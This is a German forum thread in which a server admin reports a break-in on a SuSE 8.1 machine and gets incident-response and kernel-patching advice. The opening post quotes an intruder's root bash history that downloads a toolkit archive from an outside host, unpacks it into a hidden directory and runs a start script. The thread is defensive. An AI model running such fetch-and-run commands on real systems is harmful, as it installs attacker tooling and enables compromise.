Server gehackt?

[as-n]

Hallo,

eine rmeienr Server hat gestern den SSL Port eigenmächtig geändert.
In der Bash History fand ich das:

cat /etc/issue
wget users.volja.net/conso/fu.tgz
tar fu.tgz
tar xvf fu.tgz
cd .fuckZ
rm -rf " "
./start Kd9f4
exit

Sieht IMHO nach gehackt aus, oder?
Kann man das prüfen?

Ciao André

[captaincrunch]

Sieht IMHO nach gehackt aus, oder?

Ja

Kann man das prüfen?

Wenn derjenige gut war, wirst du da relativ wenig Chancen haben. Einfachste Methode: Nutzdaten sichern, Reinitialisierung.

[yt]

Gut war er nciht unbedingt, wenn er Spuren in der history hinterlässt. Aber der einzige Weg ist:

* Backup der Nutzdaten und Logs
* Reinitialisierung

[as-n]

Vielleicht finde ich heraus wer es war, wo in den Logs habe ich da etwaige Chancen eine IP zu finden etc?

[captaincrunch]

/var/log/*

[as-n]

Also überall, naja, ich werde erstmal den Server reinitalisieren und dann beschäftige ich mich mit den logs.

[captaincrunch]

Btw.: In wessen .bash_history hast du die Einträge gefunden?

[as-n]

In der von root, aber es gab dann noch einen user secteam mit root-Rechten.

[as-n]

Wie finde ich die Shwachstelle in meinem System, irgedn wie muss der Kerl ja rein gekommen sein.
Nessus hat bei der letzten Ã?berprüfung nichts schwerwiegendes entdeckt.
Ich möchte den gleichen Fehler nicht wieder machen, aber welcher war es?

Ciao
André

[Joe User]

Welche PHP-Scripte nutzt Du? War der Apache aktuell? Kernelversion?

[as-n]

Apache 1.3.28
Kernel war der der orginal SuSE8.1 Distri
An php war nur der osCommerce Shop drauf.

Ciao
André

[checker]

Kernel war der der orginal SuSE8.1 Distri


Ciao
André

Dürfte an dem kernel liegen oder hast du den immer schön gepacht?

[as-n]

Naja, das was fou4s und yast vorgeschlagen haben, aber ob da Kernel Patches dabei waren weiß ich ehrlich gesagt nicht.
Jedenfalls ist jede nacht fou4s gelaufen.

[as-n]

Also ich finde in den Logs gar nix, kann aber auch daran liegen, dass ich keine genauen Suchkriterien habe.

[Joe User]

Vergiss die Logs, denen kannst Du nach einem ungebetenem Besuch genauso wenig trauen, wie den Binarys und Libs. Sicher die Nutzdaten (www,sqldump,config) und lass' die Kiste neu aufsetzen. Während der Reinitialisierung suchst Du nach Lücken in den PHP-Scripten und überdenkst die Notwendigkeit der von Dir angebotenen Dienste, sowie deren Konfiguration.

[as-n]

So, der Server läuft wieder, der Ke5nel war im Ã?brigen 2.4.23, daran kann es wohl nicht gelegen habne, oder?

Jetzt hätte ich noch webmin, nessus oder mysql im Verdacht, aber von allen waren die neusten Versionen drauf.

Macht yast jetzt eigentlich Kernelupdates automatisch?

Ciao
André

[captaincrunch]

der Ke5nel war im Ã?brigen 2.4.23, daran kann es wohl nicht gelegen habne, oder?

Natürlich kann es daran gelegen haben. Die mremap-Lücke betraf diese Version noch, wobei sämtliche Exploits, die diese Lücke ausnutzen auf einem sauber gewarteten System ziemlich schnell auffallen.

Was genau es war lässt sich für Außenstehende ohne genaue Kenntnis deines Setups allerdings nur erraten.

[as-n]

Wenn der 2.4.23 noch betroffen ist, wie kann ich den dann patchen und auf welche Version und wo bekomme ich die her, auf der SuSE site finde ich nur ältere Versionen.

:?:

[as-n]

Ich habe jetzt versucht den Kernel manuell upzudaten, grob nach folgender Anleitung:

Code: Select all

#!/bin/bash
cd /usr/src
# Kernel downloaden (~25MB)
wget --passive-ftp 
ftp://ftp.de.kernel.org/pub/linux/kernel/v2.4/linux-2.4.22.tar.bz2
# Kernel entpacken
tar -xjf linux-2.4.22.tar.bz2
# Symlink erstellen
ln -s linux-2.4.22 linux
cd linux
# Aktuelle Kernel-Config abspeichern
gzip -dc /proc/config.gz >.config
# Kernel-Config 'aufr umen'
make oldconfig
# Kernel kompilieren (kann dauern)
make dep clean bzImage modules modules install
# Alten Kernel sichern
cp /boot/vmlinuz /boot/vmlinuz.old
# Neuen Kernel installieren
cp arch/i386/boot/bzImage /boot/vmlinuz
# Bootloader einrichten
# Wenn du LiLo verwendest einfach 'lilo' aufrufen.
# Wenn du Grub verwendest musst du nichts machen.
# Und zuletzt - Neustarten

Leider geht schon..

Code: Select all

cd linux

nicht, der Symlink ist zwar da, aber ...naja.
Also..

Code: Select all

cd linux-2.4.24

Dann..

Code: Select all

gzip -dc /proc/config.gz >.config

No such file or directory

Code: Select all

cp /boot/vmlinuz /boot/vmlinuz.old

No such file or directory

So bekomme ich das nicht hin :-(

[as-n]

Hallo,

also, es handelt sich um einen speziellen Kernel für den Server, für den es natürlich auch kein Update von SuSE gibt.
Die config.gz existiert auch nicht, da der Kernel ohne diese Option kompiliert wurde.
Kann ich die config.gz irgend wo anders rauslesen?

[as-n]

Hat keiner eine Idee?

Ciao
André

[giffi]

Schau mal unter /boot nach da war jedenfalls bei mir eine config.

Giffi

[as-n]

Hallo,

es gibt definitiv keine config. Der Kernel wurde ohne diese Option kompiliert, leider. :(

[checker]

Hallo,

es gibt definitiv keine config. Der Kernel wurde ohne diese Option kompiliert, leider. :(

??? Keine config datei und wie will man dann einstellungen bearbeiten und ändern? :roll: :!:

MfG checker

[Joe User]

Code: Select all

ls -alhR /boot